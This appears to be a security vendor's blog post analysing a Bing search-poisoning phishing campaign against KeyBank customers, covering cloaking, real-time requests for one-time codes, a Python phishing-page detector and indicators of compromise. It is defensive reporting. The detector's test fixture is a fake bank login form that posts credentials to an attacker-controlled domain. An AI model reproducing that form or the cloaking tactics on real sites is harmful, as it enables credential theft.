While Microsoft’s Bing has only about 4% of the search engine market, crooks are drawn to it as an alternative to Google. One particularly interesting detail is that a phishing website created barely two weeks ago is already indexed and displayed above the official one.

In this blog post, we look at how criminals abuse Bing while staying under the radar, and how they get around security features such as two-factor authentication.

Bing search engine poisoning

We first noticed a phishing campaign coming from Bing’s search engine and targeting Keybank customers on November 29. A malicious link is displayed as the first result and pretends to be Keybank’s login page.

The domain name used is ixx-kexxx[.]com, which was registered on November 15. Given that it is only two weeks old and yet ranks above ibx.key.com (the real website), we surmise that the attackers are gaming Bing’s ranking algorithm.

image b68c5c

Indexing and cloaking in one go

Upon clicking the link, users are redirected to a friendly, helpful-looking website before being redirected again to the actual phishing page. We need to pause here to look at a couple of “blackhat” techniques.

That first page is meant only for crawlers and scanners (and for visitors who aren’t of interest). They scrape and index its content, and they see a clean page. The technique is fairly common, and we see similar examples in ad fraud: create content that looks real, like a blog, but serves a malicious purpose (monetization or otherwise).

image cbab11

Actual victims never see that page, because they are immediately redirected to another website, this one completely malicious. The redirect happens server-side, based on visitor attributes such as browser profile, IP address and others.

That page uses the official branding and presents a login portal for KeyBank. Once a victim types their user ID and password, the criminals receive the data immediately. Note that the phishing site uses HTTPS, which means nothing here: the padlock only guarantees that the information is encrypted in transit, and the party decrypting it at the other end is the criminal.

image 576405
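Heuristics of the kind Browser Guard applies later in this post have to run on what the victim’s browser actually receives, because, as the cloaking step shows, a scanner may only ever be served the decoy blog. The Python below is an added example, not Browser Guard’s rules: it parses the page, checks whether the bank’s brand is claimed on a domain that is not the bank’s, whether a password form sits on that page, and where the form posts. The two HTML documents are constructed; the phishing hostnames come from the IoC section and the form paths are assumptions. Note what it deliberately ignores: whether the URL is HTTPS.

```python
"""Content heuristics for a credential-phishing page like the KeyBank portal above.

Added example, not Browser Guard's rules. It scores what the victim's browser
actually receives, since a scanner may be shown the decoy blog instead. The two
HTML documents are constructed; the phishing hostnames are from the IoC section,
and the form paths are assumptions.
"""
from html.parser import HTMLParser
from urllib.parse import urljoin, urlsplit

BRAND_WORDS = ("keybank", "key.com")
OFFICIAL_DOMAINS = {"key.com"}   # ibx.key.com, the real sign-on host, lives here


def registrable(host):
    """Naive registrable domain (last two labels); a public-suffix list would
    be the production choice."""
    return ".".join(host.lower().rstrip(".").split(".")[-2:])


class LoginFormScanner(HTMLParser):
    """Collect the <title> text and, for each <form>, its resolved action and
    whether it contains a password field."""

    def __init__(self, page_url):
        super().__init__()
        self.page_url = page_url
        self.title = ""
        self.forms = []
        self._in_title = False
        self._form = None

    def handle_starttag(self, tag, attrs):
        a = {k: (v or "") for k, v in attrs}
        if tag == "title":
            self._in_title = True
        elif tag == "form":
            self._form = {"action": urljoin(self.page_url, a.get("action", "")),
                          "has_password": False}
            self.forms.append(self._form)
        elif tag == "input" and self._form is not None and a.get("type", "").lower() == "password":
            self._form["has_password"] = True

    def handle_endtag(self, tag):
        if tag == "title":
            self._in_title = False
        elif tag == "form":
            self._form = None

    def handle_data(self, data):
        if self._in_title:
            self.title += data


def phishing_reasons(url, html):
    """Return the heuristics the page trips; an empty list means nothing found.
    Whether the URL uses https is deliberately not a signal."""
    host = (urlsplit(url).hostname or "").lower()
    official = registrable(host) in OFFICIAL_DOMAINS
    scanner = LoginFormScanner(url)
    scanner.feed(html)
    claims_brand = any(w in (scanner.title + html).lower() for w in BRAND_WORDS)
    cred_forms = [f for f in scanner.forms if f["has_password"]]
    reasons = []
    if claims_brand and not official:
        reasons.append("brand-on-unofficial-domain")
    if cred_forms and not official:
        reasons.append("password-form-off-brand-domain")
    for f in cred_forms:
        action_host = (urlsplit(f["action"]).hostname or host).lower()
        if registrable(action_host) != registrable(host):
            reasons.append("form-posts-to-third-party:" + action_host)
    return reasons


# Constructed pages. The phishing one mimics the flow above: bank branding,
# user ID + password, credentials posted to a second attacker-controlled domain.
PHISH_URL = "https://xxx-ii-news.net/signon/"
PHISH_HTML = """<html><head><title>KeyBank | Sign On</title></head><body>
<form method="post" action="https://ixxx-blognew.com/collect.php">
  <input name="userid"><input type="password" name="passwd">
  <button>Sign on</button></form></body></html>"""

LEGIT_URL = "https://ibx.key.com/"
LEGIT_HTML = """<html><head><title>KeyBank | Sign On</title></head><body>
<form method="post" action="/signon"><input name="userid">
<input type="password" name="passwd"><button>Sign on</button></form></body></html>"""

if __name__ == "__main__":
    print(phishing_reasons(PHISH_URL, PHISH_HTML))
    print(phishing_reasons(LEGIT_URL, LEGIT_HTML))
```

The legitimate page trips nothing even though it contains the same title and the same password form, because the registrable domain is the bank’s and the form posts back to it. A real deployment would pair these rules with domain-age data (the two-week-old registration mentioned above is a strong signal on its own).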

Bypassing multi factor authentication

In some phishing campaigns, criminals are notified in real time when a new victim attempts to log in to their fraudulent page. One thing we noticed on this phishing page, after the first screen, was a message claiming that the internet connection was poor. This is a cover for what’s happening behind the scenes:

image a58053

Criminals often need to get past a few hurdles first. They need to log in from the same location as the victim (their fake site gives them the victim’s IP address, and they can use a proxy in the same region), and they may need to get through multi-factor authentication. Sometimes the easiest thing to do is simply to ask the victim for the code.

image 641144

Multi-factor authentication is still highly recommended, but users should be aware that criminals can ask for verification codes directly while pretending to be the real bank. We should also note that SMS verification is one of the weakest forms of two-factor authentication.

Security questions (usually three of them) are also used to reset a password or for other verification purposes (perhaps a login from a new browser or location). This phishing kit asks victims to enter that information too:

image 9fb7ae

Conclusion

Phishing is one of the biggest threats consumers face every day. Malicious links can be sent to them via email, text message, social media or they may simply come across them via a search engine.

In this particular example, Bing was tricked into indexing a website that looked legitimate but turned out to be a gateway to a phishing portal. As the domain name was unknown to Microsoft at the time, it failed to protect users.

We highly recommend adopting phishing-resistant ways to log in to important websites. Passkeys come to mind immediately, since they do not involve passwords at all. In other words, if you don’t need to type a password, there is no password to steal; and because a passkey is bound to the site’s real origin, it simply will not work on a lookalike domain.

Unfortunately, not all websites offer the latest technologies to protect their customers. While it is important to add a second factor for authentication, you may want to upgrade to an authenticator app instead of the less trustworthy SMS verification. Perhaps the most important thing to remember is that criminals can also try to request those one-time codes from you, so you should always be extremely vigilant before entering them on any website (or replying to an unknown text).

Malwarebytes Browser Guard already protected users from this phishing campaign without having seen the malicious websites before, thanks to built-in anti-phishing heuristic rules that intercept the connection and display a warning message:

image 79a70e

If you suspect your banking information has already been stolen, try to take action as quickly as possible by contacting your financial institution(s) and resetting all your passwords (especially if you reused any of them for different websites).



Indicators of Compromise

Cloaking domains

ixx-kexxx[.]com

Phishing domains

xxx-ii-news[.]net
xxx-ii-news[.]com
ixxx-blognew[.]com
new-bllog-i[.]com
info-blog-news[.]com
xv-bloging-info[.]com
xxx-new-videos[.]com

Hosting server

200.107.207[.]232